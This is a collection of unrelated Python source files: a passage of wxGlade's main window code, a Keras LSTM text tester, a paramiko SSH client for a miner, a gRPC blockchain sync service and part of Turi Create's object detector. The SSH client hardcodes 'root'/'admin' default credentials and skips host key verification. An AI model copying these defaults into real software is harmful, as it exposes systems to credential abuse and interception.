common.root.filename = filename
# decoding will done automatically by SAX XML library
if compat.PYTHON2:
infile = open(filename)
else:
infile = open(filename, "r", encoding="UTF8")
if hasattr(infile, "seek"):
# try to read file version number from the first few lines
import re
version_re = re.compile(r"<!-- generated by wxGlade (\d+)\.(\d+)\.(\d+)(\S*)\s*")
for n in range(3):
match = version_re.match( infile.readline() )
if match:
major, minor, sub, extension = match.groups()
input_file_version = (int(major), int(minor), int(sub), extension)
break
infile.seek(0)
else:
common.root.filename = None
if use_progress_dialog and config.preferences.show_progress:
p = ProgressXmlWidgetBuilder(filename, input_file_version, input_file=infile)
else:
p = XmlWidgetBuilder(filename, input_file_version)
if infile is not None:
p.parse(infile)
else:
p.parse_string(filename)
filename = None
except (EnvironmentError, SAXParseException, XmlParsingError) as msg:
if config.debugging: raise
if infile is not None:
error_msg = _("Error loading file %s:\n%s") % (misc.wxstr(filename), misc.wxstr(msg))
else:
error_msg = _("Error loading from a file-like object:\n%s") % misc.wxstr(msg)
except Exception as inst:
if config.debugging: raise
if filename and not isinstance(filename, list):
fn = os.path.basename(filename).encode('ascii','replace')
msg = _('loading file "%s"') % fn
else:
msg = _('loading from a file-like object')
bugdialog.Show(msg, inst)
finally:
if infile and filename:
infile.close()
if error_msg:
common.root.clear()
common.root.new()
common.root.saved = True
if common.history: common.history.reset()
common.app_tree.auto_expand = True # re-enable auto-expansion of nodes
wx.MessageBox(error_msg, _('Error'), wx.OK | wx.CENTRE | wx.ICON_ERROR)
return False
misc.rebuild_tree(common.root, freeze=True)
common.app_tree.auto_expand = True # re-enable auto-expansion of nodes
common.app_tree.Expand(common.root.item)
if common.root.is_template:
logging.info(_("Template loaded"))
common.root.template_data = template.Template(filename)
common.root.filename = None
end = time.time()
logging.info(_('Loading time: %.5f'), end - start)
common.root.saved = True
if common.history: common.history.reset()
#common.property_panel.Raise()
if hasattr(self, 'file_history') and filename is not None and add_to_history and \
(not common.root.is_template):
self.file_history.AddFileToHistory(misc.wxstr(filename))
if config.preferences.autosave and self.autosave_timer is not None:
self.autosave_timer.Start()
duration = end - start
if filename:
self.user_message( _("Loaded %s in %.2f seconds") % (misc.wxstr(os.path.basename(filename)), duration) )
else:
self.user_message( _("Loaded in %.2f seconds") % duration )
return True
def save_app(self, event=None):
"saves a wxGlade project onto an xml file"
np.flush_current_property()
if not common.root.filename or common.root.is_template:
self.save_app_as()
else:
# check whether we are saving a template
ext = os.path.splitext(common.root.filename)[1].lower()
if ext == ".wgt":
common.root.is_template = True
self._save_app(common.root.filename)
def _save_app(self, filename):
try:
obuffer = []
common.root.write(obuffer)
common.save_file(filename, obuffer, 'wxg')
except EnvironmentError as inst:
if config.debugging: raise
common.root.saved = False
bugdialog.ShowEnvironmentError(_('Saving this project failed'), inst)
except Exception as inst:
if config.debugging: raise
common.root.saved = False
fn = os.path.basename(filename).encode('ascii', 'replace')
bugdialog.Show(_('Save File "%s"') % fn, inst)
else:
common.root.saved = True
common.remove_autosaved()
if config.preferences.autosave and self.autosave_timer is not None:
self.autosave_timer.Start()
self.user_message( _("Saved %s") % os.path.basename(filename) )
def save_app_as(self):
"saves a wxGlade project onto an xml file chosen by the user"
if common.root.filename:
default_path, default_filename = os.path.split(common.root.filename)
else:
default_path, default_filename = self.cur_dir, "wxglade.wxg"
fn = wx.FileSelector( _("Save project as..."),
wildcard="wxGlade files (*.wxg)|*.wxg|wxGlade Template files (*.wgt) |*.wgt|"
"XML files (*.xml)|*.xml|All files|*",
flags=wx.FD_SAVE | wx.FD_OVERWRITE_PROMPT,
default_path=default_path,
default_filename=default_filename)
if not fn: return
# check for file extension and add default extension if missing
ext = os.path.splitext(fn)[1].lower()
if not ext:
fn = "%s.wxg" % fn
common.root.filename = fn
#remove the template flag so we can save the file.
common.root.properties["is_template"].set(False)
self.save_app()
self.cur_dir = os.path.dirname(fn)
self.file_history.AddFileToHistory(fn)
def save_app_as_template(self):
"save a wxGlade project as a template"
data = getattr(common.root, 'template_data', None)
outfile, data = template.save_template(data)
if outfile:
common.root.properties["is_template"].set(True)
common.root.template_data = data
self._save_app(outfile)
def on_close(self, event):
if not event.CanVeto():
event.Skip
return
if self.ask_save():
# close application
# first, let's see if we have to save the geometry...
prefs = config.preferences
if prefs.remember_geometry:
self._store_layout()
prefs.set_dict("layout", self.layout_settings)
prefs.changed = True
common.root.clear()
common.root.new()
try:
common.save_preferences()
except Exception as e:
wx.MessageBox( _('Error saving preferences:\n%s') % e,
_('Error'), wx.OK|wx.CENTRE|wx.ICON_ERROR )
self.Destroy()
common.remove_autosaved()
wx.CallAfter(wx.GetApp().ExitMainLoop)
elif event.CanVeto():
event.Veto()
def show_about_box(self):
"show the about dialog; see: about.wxGladeAboutBox"
about_box = about.wxGladeAboutBox()
about_box.ShowModal()
about_box.Destroy()
def show_manual(self, event=None):
"Show the wxGlade user manual"
self._show_html(config.manual_file)
def show_bug_tracker(self):
self._show_html("https://github.com/wxGlade/wxGlade/issues")
def show_mailing_list(self):
self._show_html("https://sourceforge.net/p/wxglade/mailman/wxglade-general/")
def show_releases(self):
self._show_html("https://github.com/wxGlade/wxGlade/releases")
def _show_html(self, html_file):
"Open browser and show an HTML documentation"
if wx.Platform == "__WXMAC__":
os.system(r'open -a Safari.app "%s"' % html_file)
else:
import webbrowser, threading
# ALB 2004-08-15: why did this block the program????? (at least on linux - GTK)
def go():
webbrowser.open_new(html_file)
t = threading.Thread(target=go)
t.setDaemon(True)
t.start()
def show_and_raise(self):
self.property_panel.Show() # self.GetMenuBar().IsChecked(self.PROPS_ID))
self.tree_panel.Show() # self.GetMenuBar().IsChecked(self.TREE_ID))
self.property_panel.Raise()
self.tree_panel.Raise()
self.Raise()
def hide_all(self):
self.tree_panel.Hide()
self.property_panel.Hide()
def import_xrc(self, infilename=None, ask_save=True):
import xrc2wxg
if ask_save and not self.ask_save():
return
if not infilename:
infilename = wx.FileSelector( _("Import file"), wildcard="XRC files (*.xrc)" "|*.xrc|All files|*",
flags=wx.FD_OPEN | wx.FD_FILE_MUST_EXIST, default_path=self.cur_dir)
if infilename:
ibuffer = []
try:
xrc2wxg.convert(infilename, ibuffer)
# Convert UTF-8 returned by xrc2wxg.convert() to Unicode
tmp = b"".join(ibuffer).decode('UTF-8')
ibuffer = ['%s\n'%line for line in tmp.split('\n')]
self._open_app(ibuffer)
common.root.saved = False
except Exception as inst:
fn = os.path.basename(infilename).encode('ascii', 'replace')
bugdialog.Show(_('Import File "%s"') % fn, inst)
def manage_templates(self):
to_edit = template.manage_templates()
if to_edit is not None and self.ask_save():
# edit the template
# TODO, you still need to save it manually...
self._open_app(to_edit, add_to_history=False)
wx.MessageBox( _("To save the changes to the template, edit the GUI as usual,\n"
"and then click File->Save As Template..."),
_("Information"), style=wx.OK|wx.ICON_INFORMATION )
####################################################################################################################
# user interface helpers
def _set_icon(self):
icon = compat.wx_EmptyIcon()
bmp = wx.Bitmap( os.path.join(config.icons_path, "icon.png") )
icon.CopyFromBitmap(bmp)
self.SetIcon(icon)
def init_layout_settings(self):
# either load from file or init with defaults
display_area = wx.Display(0).ClientArea
default_pos = display_area.TopLeft
height = display_area.height
width = 800
default_size = (width,height)
self.layout_settings = {}
self.layout_settings["layout"] = 0
self.layout_settings["sash_positions"] = [[400, 380 ], # 0: palette and properties left; tree right
[height//2,400 ], # 1: palette and tree top; properties bottom
[2*height//3,height//3] ] # 2: all on top of each other
self.layout_settings["widths"] = [width,500] # for layouts 0/1 and 2
self.layout_settings["height"] = height
self.layout_settings["x"], self.layout_settings["y"] = default_pos
if not config.preferences.remember_geometry:
return default_pos, default_size, 0
# read from preferences
try:
layout = config.preferences.get_int("layout", "layout")
x = config.preferences.get_int("layout", "x")
y = config.preferences.get_int("layout", "y")
widths = [config.preferences.get_int("layout", "widths_l0"),
config.preferences.get_int("layout", "widths_l1")]
width = widths[0] if layout<2 else widths[1]
height = config.preferences.get_int("layout", "height")
sash_positions = [[config.preferences.get_int("layout", "sash_positions_l0_l0"),
config.preferences.get_int("layout", "sash_positions_l0_l1")],
[config.preferences.get_int("layout", "sash_positions_l1_l0"),
config.preferences.get_int("layout", "sash_positions_l1_l1")],
[config.preferences.get_int("layout", "sash_positions_l2_l0"),
config.preferences.get_int("layout", "sash_positions_l2_l1")]]
except:
return default_pos, default_size, 0
if layout<0 or layout>2 or not self._check_geometry(x, y, width, height):
return default_pos, default_size, 0
self.layout_settings["height"] = height
self.layout_settings["sash_positions"] = sash_positions
self.layout_settings["widths"] = widths
return (x,y), (widths[0],height), layout # return widths[0] as 0 is the initial setting
def switch_layout(self, new_layout, initial=False):
if new_layout != self.layout_settings["layout"]:
# set the splitters
if not initial: self._store_layout()
self.splitter2.Unsplit()
self.splitter1.Unsplit()
if new_layout==0:
self.property_panel.Reparent(self.splitter2)
self.palette.Reparent(self.splitter2)
self.tree.Reparent(self.splitter1)
self.splitter1.SplitVertically(self.splitter2, self.tree)
self.splitter2.SplitHorizontally(self.palette, self.property_panel)
elif new_layout==1:
self.property_panel.Reparent(self.splitter1)
self.palette.Reparent(self.splitter2)
self.tree.Reparent(self.splitter2)
self.splitter1.SplitHorizontally(self.splitter2, self.property_panel)
self.splitter2.SplitVertically(self.palette, self.tree)
elif new_layout==2:
self.property_panel.Reparent(self.splitter1)
self.palette.Reparent(self.splitter2)
self.tree.Reparent(self.splitter2)
self.splitter1.SplitHorizontally(self.splitter2, self.property_panel)
self.splitter2.SplitHorizontally(self.palette, self.tree)
if self.layout_settings["layout"] in (0,1) and new_layout==2:
self.SetSize( (self.layout_settings["widths"][1], self.GetSize()[1]) )
elif self.layout_settings["layout"]==2 and new_layout in (0,1):
self.SetSize( (self.layout_settings["widths"][0], self.GetSize()[1]) )
self.layout_settings["layout"] = new_layout
# display in toolbar
t = self._layout_tools[new_layout]
if not t.IsToggled(): t.Toggle()
self.toolbar.Realize()
# set splitter sash positions
if new_layout==0:
self.splitter2.SetMinimumPaneSize(1)
self.splitter2.SetSashGravity(0)
self.splitter1.SetMinimumPaneSize(2)
self.splitter1.SetSashGravity(0)
elif new_layout==1:
self.splitter2.SetMinimumPaneSize(1)
self.splitter2.SetSashGravity(0)
self.splitter1.SetMinimumPaneSize(2)
self.splitter1.SetSashGravity(0.5)
elif new_layout==2:
self.splitter2.SetMinimumPaneSize(1)
self.splitter2.SetSashGravity(0)
self.splitter1.SetMinimumPaneSize(2)
self.splitter1.SetSashGravity(0.5)
positions = self.layout_settings["sash_positions"][new_layout]
self.splitter1.SetSashPosition( positions[0] )
self.splitter2.SetSashPosition( positions[1] )
def _store_layout(self):
# store position, size and splitter sash positions
self.layout_settings["x"], self.layout_settings["y"] = self.GetPosition()
layout = self.layout_settings["layout"]
self.layout_settings["sash_positions"][layout] = [self.splitter1.GetSashPosition(),
self.splitter2.GetSashPosition()]
width, height = self.GetSize()
if layout in (0,1):
self.layout_settings["widths"][0] = width
else:
self.layout_settings["widths"][1] = width
self.layout_settings["height"] = height
def _check_geometry(self, x,y,width,height):
# check whether a significant part would be visible
# also, at least a part of the top edge needs to be visible
if width<150 or height<150: return False
# check top line
top_line = wx.Rect(x,y,width,1)
min_visible = int(round(width/3))
top_line_OK = False
for d in range(wx.Display.GetCount()):
display = wx.Display(d)
client_area = display.ClientArea
if not client_area.width or not client_area.height:
# the display info is broken on some installations
continue
intersection = client_area.Intersect(top_line)
if intersection.width>=min_visible:
top_line_OK = True
break
if not top_line_OK: return False
# check rectangle
geometry = wx.Rect(x,y,width,height)
for d in range(wx.Display.GetCount()):
display = wx.Display(d)
client_area = display.ClientArea
if not client_area.width or not client_area.height:
# the display info is broken on some installations
continue
intersection = client_area.Intersect(geometry)
if intersection.width>150 and intersection.height>150 or geometry.width==-1 or geometry.height==-1:
return True
return False
class wxGlade(wx.App):
"""wxGlade application class
_exception_orig: Reference to original implementation of logging.exception()"""
def OnInit(self):
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
# replace text based exception handler by a graphical exception dialog
sys.excepthook = self.graphical_exception_handler
# use graphical implementation to show caught exceptions
self._exception_orig = logging.exception # Reference to original implementation of logging.exception()
logging.exception = self.exception
# needed for wx >= 2.3.4 to disable wxPyAssertionError exceptions
if not config.debugging:
self.SetAssertMode(0)
common.init_preferences()
self.locale = wx.Locale(wx.LANGUAGE_DEFAULT) # avoid PyAssertionErrors
#compat.wx_ArtProviderPush(wxGladeArtProvider())
frame = wxGladeFrame()
self.SetTopWindow(frame)
self.SetExitOnFrameDelete(True)
self.init_idle()
if config.inform_screen_reader:
message = ("It seems you have a screen reader software installed.\n"
"Please be aware that there are some options to improve wxGlade accessibility\n"
"with screen readers.\n"
"See menu Edit -> Preferences -> Accessibility.")
wx.CallLater(1000, wx.MessageBox, message, "Accessibility Info")
return True
def OnExit(self):
"Restore original exception handler and logging.exception() on exit"
sys.excepthook = sys.__excepthook__
logging.exception = self._exception_orig
return 0
def init_idle(self):
if wx.Platform == "__WXMAC__" and compat.IS_CLASSIC:
# it seems that EVT_IDLE makes wx.CallAfter stall from time to time, so we use a timer
wx.CallLater(200, self.OnIdle)
else:
self.Bind(wx.EVT_IDLE, self.OnIdle)
def OnIdle(self, event=None):
"Idle tasks - currently show error messages only; see: show_msgdialog()"
try:
self.show_msgdialog()
finally:
if wx.Platform == "__WXMAC__" and compat.IS_CLASSIC:
wx.CallLater(200, self.OnIdle)
def show_msgdialog(self):
"""
Check for log messages and show them
see: main.wxGlade.OnIdle(), log.getBufferAsList(), msgdialog.MessageDialog"""
log_msg = log.getBufferAsString()
if not log_msg:
return
# initialise message dialog
msg_dialog = msgdialog.MessageDialog(None, -1, "")
msg_dialog.msg_list.InsertColumn(0, "")
# clear dialog and show new messages
msg_dialog.msg_list.Freeze()
msg_dialog.msg_list.DeleteAllItems()
for line in log_msg.split('\n'):
msg_dialog.msg_list.Append([line, ])
msg_dialog.msg_list.SetColumnWidth(0, -1)
msg_dialog.msg_list.Thaw()
msg_dialog.ShowModal()
msg_dialog.Destroy()
def graphical_exception_handler(self, exc_type, exc_value, exc_tb):
"""Show detailed information about uncaught exceptions in bugdialog.BugReport.
The shown exception will be logged to the log file in parallel.
The exception information will be cleared after the bug dialog has closed.
exc_type: Type of the exception (normally a class object)
exc_value: The "value" of the exception
exc_tb: Call stack of the exception
see: bugdialog.BugReport(), bugdialog.Show()"""
bugdialog.ShowEI(exc_type, exc_value, exc_tb)
if compat.PYTHON2: sys.exc_clear()
def exception(self, msg, *args, **kwargs):
"""Graphical replacement of logging.exception().
All exception details logged with logging.exception() will be shown in bugdialog.BugReport.
The shown exception will be logged to the log file ding.
The exception information will be cleared after the bug dialog has closed.
msg: Short description of the exception
see: bugdialog.BugReport, bugdialog.ShowEI()"""
if args:
try:
msg = msg % args
except TypeError:
log.exception_orig(_('Wrong format of a log message'))
(exc_type, exc_value, exc_tb) = sys.exc_info()
bugdialog.ShowEI(exc_type, exc_value, exc_tb, msg)
if compat.PYTHON2: sys.exc_clear()
def main(filename=None):
"if filename is not None, loads it"
logging.info(_("Using wxPython %s"), config.wx_version)
common.history = history.History()
app = wxGlade()
if filename is not None:
win = app.GetTopWindow()
if os.path.splitext(filename)[1].upper() == ".XRC":
win.import_xrc(filename)
else:
win._open_app(filename, False)
# mainly for debugging we want the first window to be opened already
if filename and config.open_design_window and common.root.children:
editor = common.root.children[0]
misc.set_focused_widget(editor)
editor.create()
common.app_tree.ExpandAllChildren(editor.item)
win.cur_dir = os.path.dirname(filename)
#win = app.GetTopWindow()
##win.import_xrc(r"D:\Python\Sources35\wxglade\wxglade_dev\tests\casefiles\CalendarCtrl.xrc")
#win.import_xrc(r"D:\Python\Sources35\wxglade\wxglade_dev\tests\casefiles\AllWidgets_30.xrc")
app.MainLoop()
|
lstm_tester.py
|
from __future__ import print_function
from keras.utils.data_utils import get_file
import io
import numpy as np
from keras.models import load_model
import pickle
import heapq
import cv2
from threading import Thread
letter_list = ['e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e',
'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e', 'e']
letter_string = ""
predictions = []
def sample(preds, top_n=3):
preds = np.asarray(preds).astype('float64')
preds = np.log(preds)
exp_preds = np.exp(preds)
preds = exp_preds / np.sum(exp_preds)
return heapq.nlargest(top_n, range(len(preds)), preds.take)
def prepare_input(text):
x = np.zeros((1, len(text), len(chars)))
for t, char in enumerate(text):
x[0, t, char_indices[char]] = 1.
return x
def predict_completion(text):
original_text = text
completion = ''
while True:
x = prepare_input(text)
preds = model.predict(x, verbose=0)[0]
next_index = sample(preds, top_n=1)[0]
next_char = indices_char[next_index]
text = text[1:] + next_char
completion += next_char
if len(original_text + completion) + 2 > len(original_text) and next_char == ' ':
return completion
def thread_pred():
while True:
if len(letter_string) is 40:
predict_completions(letter_string, 3)
print()
def predict_completions(text, n=3):
if len(text) is 40:
x = prepare_input(text)
preds = model.predict(x, verbose=0)[0]
next_indices = sample(preds, n)
print([indices_char[idx] + predict_completion(text[1:] + indices_char[idx]) for idx in next_indices])
#path = get_file('nietzsche.txt', origin='https://s3.amazonaws.com/text-datasets/nietzsche.txt')
path = 'mi_ro.txt'
with io.open(path, encoding='utf-8') as f:
text = f.read().lower()
print('corpus length:', len(text))
chars = sorted(list(set(text)))
char_indices = dict((c, i) for i, c in enumerate(chars))
indices_char = dict((i, c) for i, c in enumerate(chars))
print('unique chars: ', len(chars))
SEQUENCE_LENGTH = 40
step = 3
sentences = []
next_chars = []
for i in range(0, len(text) - SEQUENCE_LENGTH, step):
sentences.append(text[i: i + SEQUENCE_LENGTH])
next_chars.append(text[i + SEQUENCE_LENGTH])
print('num training examples: ', len(sentences))
X = np.zeros((len(sentences), SEQUENCE_LENGTH, len(chars)), dtype=np.bool)
y = np.zeros((len(sentences), len(chars)), dtype=np.bool)
for i, sentence in enumerate(sentences):
for t, char in enumerate(sentence):
X[i, t, char_indices[char]] = 1
y[i, char_indices[next_chars[i]]] = 1
model = load_model('ro_keras_model.h5')
#history = pickle.load(open("history.p", "rb"))
prepare_input("This is an example of input for our LSTM".lower())
quotes = [
"It is not a lack of love, but a lack of friendship that makes unhappy marriages.",
]
for q in quotes:
seq = q[:40].lower()
print(seq)
predict_completions(seq, 5)
print()
# let = ''.join(letter_list)
# test=let.lower()
# print(let.lower())
# print(len(let))
# predict_completions(test,3)
# print()
words_thread = Thread(target=thread_pred, args=())
words_thread.start()
cap = cv2.VideoCapture(0)
while True:
ret, img = cap.read()
cv2.imshow("fr", img)
key = cv2.waitKey(1)
if key != -1:
letter_list.pop(0)
letter_list.append(chr(key))
letter_string = ''.join(letter_list)
letter_string = letter_string.lower()
|
ssh.py
|
'''ssh client
use with, or finally close
See
https://daanlenaerts.com/blog/2016/07/01/python-and-ssh-paramiko-shell/
https://stackoverflow.com/questions/39606573/unable-to-kill-python-script
'''
import threading
import paramiko
class Ssh:
'''communicate with miner through ssh'''
shell = None
client = None
transport = None
closed = False
strdata = ''
alldata = ''
def __init__(self, address, username='root', password='admin', port=22):
print("Connecting to server on ip {0}:{1}".format(address, port))
self.client = paramiko.client.SSHClient()
self.client.set_missing_host_key_policy(paramiko.client.AutoAddPolicy())
self.client.connect(address, port=port, username=username, password=password, look_for_keys=False)
print("Connection created")
self.thread = threading.Thread(target=self.process)
self.thread.start()
def exec_command(self, command):
'''use this if you only need to run ONE command
This is the preferred way to communicate with miner
returns a list of lines as the response to the command
'''
_, stdout_, _ = self.client.exec_command(command)
#this will make it block until response is received
stdout_.channel.recv_exit_status()
return stdout_.readlines()
def close_connection(self):
'''close the ssh connection'''
self.thread.join(timeout=10)
if self.client != None:
self.client.close()
if self.transport is not None:
self.transport.close()
self.closed = True
def open_shell(self):
'''open shell command to run a series of command
try to avoid if possible
may have some async/threading issues
'''
self.shell = self.client.invoke_shell()
def send_shell(self, command):
'''send command to shell'''
if self.shell:
self.shell.send(command + "\n")
else:
print("Shell not opened.")
def process(self):
'''process the commands'''
while self.closed is False:
# Print data when available
if self.shell != None and self.shell.recv_ready():
alldata = self.shell.recv(1024)
while self.shell.recv_ready():
alldata += self.shell.recv(1024)
strdata = str(alldata, "utf8")
strdata.replace('\r', '')
print(strdata, end="")
if strdata.endswith("$ "):
print("\n$ ", end="")
print("ssh process closed")
def get(self, remotefile, localfile):
ftp_client = self.client.open_sftp()
ftp_client.get(remotefile, localfile)
ftp_client.close()
def put(self, localfile, remotefile):
ftp_client = self.client.open_sftp()
ftp_client.put(localfile, remotefile)
ftp_client.close()
|
synchronization.py
|
#coding:utf-8
from p2ptest.proto import grpc_pb2
from p2ptest.proto import grpc_pb2_grpc
import p2ptest.block as block
from p2ptest.enum.enum import *
import threading
import time
import re
_compiNum = re.compile("^\d+$") #判斷全數字用
_compiW = re.compile("^\w{64}")
class Synchronization(grpc_pb2.SynchronizationServicer):
def From(self, request, context):
# => 請求(依據高度或Hash)
# <= 區塊
global _compiNum
print("=> [From]Info:%s" % str(request.value))
print("<= [From]Block:%s" % str(request.value))
try :
if _compiNum.search(request.value) != None:
return block.block.Chain.getBlockFromHeight(int(request.value)).pb2
elif _compiW.search(request.value)!= None:
return block.block.Chain.getBlockFromHash(request.value).pb2
except Exception as e:
print(e)
raise Exception("So Fast ,Wait... , Don't Close")
def To(self, request, context):
# => Block
# <= 如果高度增加 回傳 SYNCHRONIZATION ,否則 NOT_SYNCHRONIZATION
global __BranchTarget,flag
b = block.block.Block()
b.pb2 = request
print("=> [To] Block:%s" % b.pb2.blockhash)
status = block.block.Chain.addBlock(b.pb2.blockhash,b)
print("<= [To] Response:%sSYNCHRONIZATION" % ("" if "HEIGHT_ADD" == status else "NOT_") )
if "HEIGHT_ADD" == status:
flag = False
__BranchTarget = ""
return grpc_pb2.Message(value = "SYNCHRONIZATION")
return grpc_pb2.Message(value = "NOT_SYNCHRONIZATION")
# 簡化前
# if "DIFFERENT_TREE" == status:
# return grpc_pb2.Message(value = "NOT_SYNCHRONIZATION")
# if "SYNC_STATUS" == status:
# return grpc_pb2.Message(value = "NOT_SYNCHRONIZATION")
# return grpc_pb2.Message(value = "NOT_SYNCHRONIZATION")
__BranchTarget = ""
flag = False
def setBranchTarget(hashvalue):
global flag,__BranchTarget
__BranchTarget,flag = hashvalue,True
print("Status => Sync")
threading.Thread(target = unlock).start()
def unlock():
global flag,__BranchTarget
time.sleep(600);
__BranchTarget,flag = "",False
def Task(stub,task,message):
return stub.From(message) if task == FROM else stub.To(message)
# 等同
# if task == FROM :
# return stub.From(message)
# elif task == TO :
# return stub.To(message)
|
object_detector.py
|
# -*- coding: utf-8 -*-
# Copyright © 2017 Apple Inc. All rights reserved.
#
# Use of this source code is governed by a BSD-3-clause license that can
# be found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause
"""
Class definition and utilities for the object detection toolkit.
"""
from __future__ import print_function as _
from __future__ import division as _
from __future__ import absolute_import as _
import time as _time
import itertools as _itertools
from datetime import datetime as _datetime
import six as _six
import turicreate as _tc
import numpy as _np
from threading import Thread as _Thread
from six.moves.queue import Queue as _Queue
from turicreate.toolkits._model import CustomModel as _CustomModel
import turicreate.toolkits._internal_utils as _tkutl
from turicreate.toolkits import _coreml_utils
from turicreate.toolkits._model import PythonProxy as _PythonProxy
from turicreate.toolkits._internal_utils import (_raise_error_if_not_sframe,
_numeric_param_check_range)
from turicreate import config as _tc_config
from turicreate.toolkits._main import ToolkitError as _ToolkitError
from .. import _pre_trained_models
from ._evaluation import average_precision as _average_precision
from .._mps_utils import (use_mps as _use_mps,
mps_device_memory_limit as _mps_device_memory_limit,
MpsGraphAPI as _MpsGraphAPI,
MpsGraphNetworkType as _MpsGraphNetworkType,
MpsGraphMode as _MpsGraphMode,
mps_to_mxnet as _mps_to_mxnet,
mxnet_to_mps as _mxnet_to_mps)
_MXNET_MODEL_FILENAME = "mxnet_model.params"
def _get_mps_od_net(input_image_shape, batch_size, output_size, anchors,
config, weights={}):
"""
Initializes an MpsGraphAPI for object detection.
"""
network = _MpsGraphAPI(network_id=_MpsGraphNetworkType.kODGraphNet)
c_in, h_in, w_in = input_image_shape
c_out = output_size
h_out = h_in // 32
w_out = w_in // 32
c_view = c_in
h_view = h_in
w_view = w_in
network.init(batch_size, c_in, h_in, w_in, c_out, h_out, w_out,
weights=weights, config=config)
return network
# Standard lib functions would be great here, but the formatting options of
# timedelta are not great
def _seconds_as_string(seconds):
"""
Returns seconds as a human-friendly string, e.g. '1d 4h 47m 41s'
"""
TIME_UNITS = [('s', 60), ('m', 60), ('h', 24), ('d', None)]
unit_strings = []
cur = max(int(seconds), 1)
for suffix, size in TIME_UNITS:
if size is not None:
cur, rest = divmod(cur, size)
else:
rest = cur
if rest > 0:
unit_strings.insert(0, '%d%s' % (rest, suffix))
return ' '.join(unit_strings)
def _raise_error_if_not_detection_sframe(dataset, feature, annotations, require_annotations):
_raise_error_if_not_sframe(dataset, 'datset')
if feature not in dataset.column_names():
raise _ToolkitError("Feature column '%s' does not exist" % feature)
if dataset[feature].dtype != _tc.Image:
raise _ToolkitError("Feature column must contain images")
if require_annotations:
if annotations not in dataset.column_names():
raise _ToolkitError("Annotations column '%s' does not exist" % annotations)
if dataset[annotations].dtype not in [list, dict]:
raise _ToolkitError("Annotations column must be of type dict or list")
def create(dataset, annotations=None, feature=None, model='darknet-yolo',
classes=None, batch_size=0, max_iterations=0, verbose=True,
**kwargs):
"""
Create a :class:`ObjectDetector` model.
Parameters
----------
dataset : SFrame
Input data. The columns named by the ``feature`` and ``annotations``
parameters will be extracted for training the detector.
annotations : string
Name of the column containing the object detection annotations. This
column should be a list of dictionaries (or a single dictionary), with
each dictionary representing a bounding box of an object instance. Here
is an example of the annotations for a single image with two object
instances::
[{'label': 'dog',
'type': 'rectangle',
'coordinates': {'x': 223, 'y': 198,
'width': 130, 'height': 230}},
{'label': 'cat',
'type': 'rectangle',
'coordinates': {'x': 40, 'y': 73,
'width': 80, 'height': 123}}]
The value for `x` is the horizontal center of the box paired with
`width` and `y` is the vertical center of the box paired with `height`.
'None' (the default) indicates the only list column in `dataset` should
be used for the annotations.
feature : string
Name of the column containing the input images. 'None' (the default)
indicates the only image column in `dataset` should be used as the
feature.
model : string optional
Object detection model to use:
- "darknet-yolo" : Fast and medium-sized model
classes : list optional
List of strings containing the names of the classes of objects.
Inferred from the data if not provided.
batch_size: int
The number of images per training iteration. If 0, then it will be
automatically determined based on resource availability.
max_iterations : int
The number of training iterations. If 0, then it will be automatically
be determined based on the amount of data you provide.
verbose : bool, optional
If True, print progress updates and model details.
Returns
-------
out : ObjectDetector
A trained :class:`ObjectDetector` model.
See Also
--------
ObjectDetector
Examples
--------
.. sourcecode:: python
# Train an object detector model
>>> model = turicreate.object_detector.create(data)
# Make predictions on the training set and as column to the SFrame
>>> data['predictions'] = model.predict(data)
# Visualize predictions by generating a new column of marked up images
>>> data['image_pred'] = turicreate.object_detector.util.draw_bounding_boxes(data['image'], data['predictions'])
"""
_raise_error_if_not_sframe(dataset, "dataset")
from ._mx_detector import YOLOLoss as _YOLOLoss
from ._model import tiny_darknet as _tiny_darknet
from ._sframe_loader import SFrameDetectionIter as _SFrameDetectionIter
from ._manual_scheduler import ManualScheduler as _ManualScheduler
import mxnet as _mx
from .._mxnet import _mxnet_utils
if len(dataset) == 0:
raise _ToolkitError('Unable to train on empty dataset')
_numeric_param_check_range('max_iterations', max_iterations, 0, _six.MAXSIZE)
start_time = _time.time()
supported_detectors = ['darknet-yolo']
if feature is None:
feature = _tkutl._find_only_image_column(dataset)
if verbose:
print("Using '%s' as feature column" % feature)
if annotations is None:
annotations = _tkutl._find_only_column_of_type(dataset,
target_type=[list, dict],
type_name='list',
col_name='annotations')
if verbose:
print("Using '%s' as annotations column" % annotations)
_raise_error_if_not_detection_sframe(dataset, feature, annotations,
require_annotations=True)
is_annotations_list = dataset[annotations].dtype == list
_tkutl._check_categorical_option_type('model', model,
supported_detectors)
base_model = model.split('-', 1)[0]
ref_model = _pre_trained_models.OBJECT_DETECTION_BASE_MODELS[base_model]()
params = {
'anchors': [
(1.0, 2.0), (1.0, 1.0), (2.0, 1.0),
(2.0, 4.0), (2.0, 2.0), (4.0, 2.0),
(4.0, 8.0), (4.0, 4.0), (8.0, 4.0),
(8.0, 16.0), (8.0, 8.0), (16.0, 8.0),
(16.0, 32.0), (16.0, 16.0), (32.0, 16.0),
],
'grid_shape': [13, 13],
'aug_resize': 0,
'aug_rand_crop': 0.9,
'aug_rand_pad': 0.9,
'aug_rand_gray': 0.0,
'aug_aspect_ratio': 1.25,
'aug_hue': 0.05,
'aug_brightness': 0.05,
'aug_saturation': 0.05,
'aug_contrast': 0.05,
'aug_horizontal_flip': True,
'aug_min_object_covered': 0,
'aug_min_eject_coverage': 0.5,
'aug_area_range': (.15, 2),
'aug_pca_noise': 0.0,
'aug_max_attempts': 20,
'aug_inter_method': 2,
'lmb_coord_xy': 10.0,
'lmb_coord_wh': 10.0,
'lmb_obj': 100.0,
'lmb_noobj': 5.0,
'lmb_class': 2.0,
'non_maximum_suppression_threshold': 0.45,
'rescore': True,
'clip_gradients': 0.025,
'weight_decay': 0.0005,
'sgd_momentum': 0.9,
'learning_rate': 1.0e-3,
'shuffle': True,
'mps_loss_mult': 8,
# This large buffer size (8 batches) is an attempt to mitigate against
# the SFrame shuffle operation that can occur after each epoch.
'io_thread_buffer_size': 8,
}
if '_advanced_parameters' in kwargs:
# Make sure no additional parameters are provided
new_keys = set(kwargs['_advanced_parameters'].keys())
set_keys = set(params.keys())
unsupported = new_keys - set_keys
if unsupported:
